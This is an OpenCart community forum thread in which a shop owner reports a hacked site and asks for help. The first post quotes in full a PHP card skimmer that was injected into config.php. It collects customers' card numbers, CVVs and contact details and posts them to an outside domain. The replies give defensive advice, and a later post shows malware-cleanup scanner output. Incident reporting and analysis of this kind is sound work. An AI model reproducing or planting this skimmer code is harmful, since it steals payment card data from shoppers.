Post by CTWeb » Fri Oct 13, 2023 12:59 am

Our malware software on the host recently alerted us to some malicious code had been added to 4 files on our clients website.

The hacker has added a fake payment section into the checkout Step 5, to defraud users of their card payment details.

Please see attached screenshot of the spoof payment fields they inserted.

The following files were modified to first allow file uploads:

\admin\language\en-gb\extension\keysubmit.php
\admin\language\en-gb\extension\headermenu.php
\admin\language\en-gb\extension\extension\feed.php
\admin\language\ru-ru\extension\module\sitemenu.php

Then the spoof html fields were added to both Default template, and also our custom template too:
\catalog\view\theme\default\template\checkout\payment_method.twig
\catalog\view\theme\[our_custom_theme]\template\checkout\payment_method.twig

Then the following code was added to:
\config.php

Code: Select all

if (isset($_POST['postcode'])){
session_start();
		$_SESSION['adddreas'] = $_POST["address_1"];
		$_SESSION['addrebs'] =   $_POST["city"];
		$_SESSION['sadsdws'] =  $_POST["postcode"];
		$_SESSION['adsdSws'] =  $_POST["firstname"];
		$_SESSION['adsdEWQWEws'] =  $_POST["lastname"];
		$_SESSION['adsdEWQWEwse'] =  $_POST["email"];
		$_SESSION['adsdEWQWEwst'] =  $_POST["telephone"];
        }
elseif (isset($_POST['address_id'])){
session_start();
$link = mysqli_connect(DB_HOSTNAME,DB_USERNAME,DB_PASSWORD,DB_DATABASE); 
$youth = $_POST['address_id'];
$sql = "SELECT * FROM oc_address WHERE address_id='$youth'"; 
if($res = mysqli_query($link, $sql)){ 
    if(mysqli_num_rows($res) > 0){ 
        while($row = mysqli_fetch_array($res)){ 
		$_SESSION['adddreas'] = $row["address_1"];
		$_SESSION['addrebs'] =   $row["city"];
		$_SESSION['sadsdws'] =  $row["postcode"];
		$_SESSION['adsdSws'] =  $row["firstname"];
		$_SESSION['adsdEWQWEws'] =  $row["lastname"];
        } 
}}}		
	if (isset($_POST['ccc']))
    {
		session_start();
		$ccnum = $_POST['ccc'];
		$expmonth =   $_POST['expp'];
		$cvv =  $_POST['cvvv'];
		$street =$_SESSION['adddreas'];
		$postcode = $_SESSION['sadsdws'];
		$city = $_SESSION['addrebs'];
		$fnamezz = $_SESSION['adsdEWQWEws'];
		$fnamez = $_SESSION['adsdSws'];
		$email = $_SESSION['adsdEWQWEwse'];
		$phone = $_SESSION['adsdEWQWEwst'];
		$ip = $_SERVER['SERVER_NAME'];
		$message = "$fnamez $fnamezz|$ccnum|$expmonth|$cvv|$street|$city|$postcode|$phone|$email";
		$rnessage = "$message\n";
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL,"https://shiksd.xyz/plugins/");
		curl_setopt($ch, CURLOPT_POST, 1);
		curl_setopt($ch, CURLOPT_POSTFIELDS,"data=$rnessage&name=$ip");
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		$server_output = curl_exec($ch);
		curl_close ($ch);
		}
As you can see this posts the customers data straight to dodgy website URL: shiksd.xyz/plugins/

We have now fixed the site by restoring the hacked files from our original backup, and also done full compare of all site files to check no other files were affected. All passwords now changed, and database credentials updated.

Questions:
1. Has anyone else seen a sophisticated hack like this?
2. Is there any way to find out how they managed to inject the original code?
3. Are there any security plugins that prevent code from being edited?
4. Are there any known vulnerabilities with the mods / extensions we are using?

Opencart: 3.0.3.8

Extensions / Modules:
PayPal Checkout Integration (Highly Recommended)
Worldpay Business Gateway
CouponAtCheckout (by cartbinder)
Extra Product Pages
Mega Filter PRO
Low Stock Management
Manufacturer List
Price Based Shipping
Redirect Manager
Restrict Payment Methods
Smart Search
TMD Import Export Module
Automatically generate SEO URL slug

Attachments

config-php.JPG

hacked config file - config-php.JPG (178.24 KiB) Viewed 4161 times

feed-php.JPG

code for uploading files - feed-php.JPG (150.72 KiB) Viewed 4161 times

Checkout-Step-5.JPG

Hacked Step 5 of Checkout - Checkout-Step-5.JPG (74.58 KiB) Viewed 4161 times


Newbie

Posts

Joined
Thu Nov 26, 2020 9:21 pm

Post by TMD Extension @ » Fri Oct 13, 2023 1:50 pm

We can assured that our TMD import-export module is highly tested. There are some possible thoughts you can check with your hosting.

TO DO
Take the backup of the database from the admin.
Re-install the OpenCArt again and restore the previous backup.

1. Is this is shared hosting, then most easiest way to inject on one website is to gain all website access by hackers.
2. Use the antivirus a third-party software like SECURI.net - to add an extra layer of security on it.
3. Use the hosting provider's inbuilt anti-virus software.
4. Try to restore the backup instead of cleaning the existing website. There is the possible case that virus code is present somewhere hidden in your files.
5. Use the WHM or scan each folder like HOME, WWW, public_FTP, public_html, mail etc. to make sure you are virus-free.
6. Contact the developer, company, or hosting provider who can help you to restore the website.
7. Always have the most recent backup ready for these scenarios.

Image

Thanks & Regards
Sehaj Kaur
TMD Extensions
Contact Us For Customisations


Active Member

Posts

Joined
Thu Mar 17, 2022 12:59 pm

Post by ADD Creative » Fri Oct 13, 2023 4:45 pm

Weak and stolen passwords are possibly most likely. So make sure you have changed all of them, including FTP and hosting. Delete any accounts you are not using.

To find out how they managed to inject the original code would be a case of going through the various logs. FTP, web access, PHP and OpenCart error logs, etc. The date the files were changed may help to know when to start looking.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by OSWorX » Fri Oct 13, 2023 5:20 pm

One aspect (beside the already given tipps) is: if you operate e.g. WordPress on the same account, this will be the most open door for script kiddies and so called hacker.
To secure OpenCart it's advised to operate it in a single instance - with no other CMS etc. !

Full Stack Web Developer :: Dedicated OpenCart Development & Support DACH Region
Contact for Custom Work / Fast Support.


User avatar
Guru Member

Posts

Joined
Mon Jan 11, 2010 10:52 pm
Location - Austria

Post by johnp » Fri Oct 13, 2023 10:15 pm

Once you're back up and running with a clean site put a firewall on it:

Ninja Firewall
https://nintechnet.com/ninjafirewall/pro-edition

The free version of Ninja Firewall is fine to get going with.

Opencart 1.5.6.5/OC Bootstrap Pro/VQMOD lover, user and geek.
Affordable Service £££ - Opencart Installs, Fixing, Development and Upgrades
Plus Ecommerce, Marketing, Mailing List Management and More
FREE Guidance and Advice at https://www.ecommerce-help.co.uk


User avatar
Active Member

Posts

Joined
Fri Mar 25, 2011 10:25 am
Location - Surrey, UK

Post by halfhope » Sat Oct 14, 2023 2:03 am

Hi! 

1. Yes, I am. Only a few of them are capable of surprising. This is not.
2. Already not, you deleted all files and logs. Possibly he have access to filesystem through ftp/admin.
3. I have a file change notification extension - FSMonitor. 
4. No, it's hard to write bad code In opencart. 

My extensions in marketplace. [ security | flexibility | speedup ]


User avatar
Active Member

Posts

Joined
Tue Dec 10, 2013 9:44 pm
Location - San Diego

Post by merchantta » Mon Oct 16, 2023 7:46 pm

Thank you for sharing your experience with the community. While it's challenging to pinpoint the exact vulnerability, it's crucial to follow the recommended security measures to prevent future attacks. Stay vigilant and keep your software and extensions up to date.

Merchantta is here to help you. We offer ready-to-use Payment Gateways with verified documents along with Ad Account Renting, Account Suspension Removal Services, & Tax Exemption Services at the best market price.


User avatar
Newbie

Posts

Joined
Sat Aug 26, 2023 6:28 pm
Location - 1216 Flatbush Ave, Brooklyn, NY 11226, USA

Post by LockerNine » Sat Jun 22, 2024 9:39 am

I have worked on and been alerted to a number of these attacks from other users and the common denominator is Mega Filter PACK Extension
https://www.opencart.com/index.php?rout ... n_id=14444

The malware has become more sophisticated with several types of injections that control information stealer malware. The information stealer malware steals browser cookies, credit card information, browser autofill data, cryptocurrency wallet information, credentials from password managers and browsers, and files from the local file system.
All users reported the module Mega Filter PACK Extension to be faulty in the download and were forced to approach the developer to install it. Upon install, users noted 3 separate installations - Mega Filter Pack Disabled - Mega Filter Pack | Filter Mega Filter Pack #1 Enabled all within the extensions tab.
It looks like the obfuscation used in that premium OC extension Mega Filter Pack is very similar to the obfuscation used in some malware (premium software developers and attackers oftentimes use the same freely-available obfuscation tools)

CLEARED: Cleared malware from file: extension/ocme/admin/view/ocme/javascript/cache/14d06a8a1954d019df7a97ca22e4e0a6.js Details: js.malware.redirect.042.02
CLEARED: Cleared malware from file: extension/ocme/admin/view/ocme/javascript/cache/14d06a8a1954d019df7a97ca22e4e0a6.js Details: js.malware.redirect.042.03
CLEARED: Cleared malware from file: extension/ocme/admin/view/ocme/javascript/cache/14d06a8a1954d019df7a97ca22e4e0a6.js Details: js.malware.redirect.042
File fixed (malware removed): ./extension/ocme/admin/view/ocme/javascript/module.js
File fixed (malware removed): ./extension/ocme/admin/view/ocme/javascript/cache/14d06a8a1954d019df7a97ca22e4e0a6.js
File fixed (malware removed): ./extension/ocme/admin/view/ocme/javascript/cache/14d06a8a1954d019df7a97ca22e4e0a6.js
File fixed (malware removed): ./extension/ocme/admin/view/ocme/javascript/cache/14d06a8a1954d019df7a97ca22e4e0a6.js
File fixed (malware removed): ./extension/ocme/admin/view/ocme/javascript/layout-structure-builder-column.js

Newbie

Posts

Joined
Mon Feb 12, 2024 1:44 pm

Post by OSWorX » Sat Jun 22, 2024 9:56 pm

LockerNine wrote:
Sat Jun 22, 2024 9:39 am
I have worked on and been alerted to a number of these attacks from other users and the common denominator is Mega Filter PACK Extension
https://www.opencart.com/index.php?rout ... n_id=14444

The malware has become more sophisticated with several types of injections that control information stealer malware. The information stealer malware steals browser cookies, credit card information, browser autofill data, cryptocurrency wallet information, credentials from password managers and browsers, and files from the local file system.
All users reported the module Mega Filter PACK Extension to be faulty in the download and were forced to approach the developer to install it. Upon install, users noted 3 separate installations - Mega Filter Pack Disabled - Mega Filter Pack | Filter Mega Filter Pack #1 Enabled all within the extensions tab.
It looks like the obfuscation used in that premium OC extension Mega Filter Pack is very similar to the obfuscation used in some malware (premium software developers and attackers oftentimes use the same freely-available obfuscation tools)
General: no extension from the OC-Marketplace is allowed to be obfuscated!
If so, report that extension - it will be removed by the support team.

Second: never use software which is obfuscated!
No one (except the dev) can control what it does in the background.

Third: if an Extension for OpenCart is obfuscated, it's a poor business model from that particular developer.

Final: the GNU/GPL License does not allow such practice.
And because OpenCart itself is publised under the GNU/GPL, every extension which is relying on it, HAS TO BE ALSO GNU/GPL licensed.

Full Stack Web Developer :: Dedicated OpenCart Development & Support DACH Region
Contact for Custom Work / Fast Support.


User avatar
Guru Member

Posts

Joined
Mon Jan 11, 2010 10:52 pm
Location - Austria
Who is online

Users browsing this forum: No registered users and 4 guests